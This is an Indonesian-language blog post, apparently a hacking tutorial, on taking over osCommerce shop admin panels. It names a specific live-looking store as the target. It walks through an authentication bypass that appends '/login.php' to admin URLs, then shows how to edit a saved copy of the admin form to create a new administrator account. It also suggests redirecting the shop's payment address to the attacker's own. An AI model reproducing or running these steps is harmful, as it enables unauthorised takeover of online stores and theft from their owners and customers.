Posts
kali ini saya menulis tutorial tentang bypas oscom biasa nya fck editor buat cms kayak ini, tapi ini beda
mungkin ada yg tau, tapi ini buat yg blom tau <-- seperti saya hahaha
langsung ke TKP saja
Cekibrott..
ex : http://www.fabulousmom.com/
cari tempat login adminnya
http://www.fabulousmom.com/catalog/admin/
lalu lakukan bypass
http://www.fabulousmom.com/catalog/admin/orders.php/ogin.php
cari letak page adminstratornya, biasanya di
administrators.php
admin_file.php
admin.php
so, jadinya
http://www.fabulousmom.com&/catalog/admin/administrators.php/login.php
lakukan insert/add new admin
http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=new
klik kanan > view sourcec
* PERHATIKAN *
lalu rubah pada kode berikut :
<form name="administrator" action="http://www.fabulousmom.com/catalog/admin/administrators.php?action=insert" method="post">
jadi
<form name="administrator" action="http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=insert" method="post">
==================
<input type="image" src="includes/languages/english/images/buttons/button_save.gif" border="0" alt="Save" title=" Save ">
jadi
<input type="submit" border="0" alt="Save" title=" Save " value="add" action="http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=insert" method="post" enctype="multipart//form-data">
====================================
lalu save dengan nama rce_oscommerce.html
dan jalankan file tersebut lalu tombol add
ga terjadi apa² kan
salah sekarang tinggal login ajah dgn user dan password yg km buat di rce_oscommerce.html pada web target
trick di atas bisa juga langsung ganti alamat pp nya ma alamat pp anda
tingal ganti lokasi bypass nya /admin/module.php/login.php?set=payment
sekian dulu dari wassalammualikum wr.wb
asal mu asal dari Forum Tetangga
and mbah google
No comments:
Post a Comment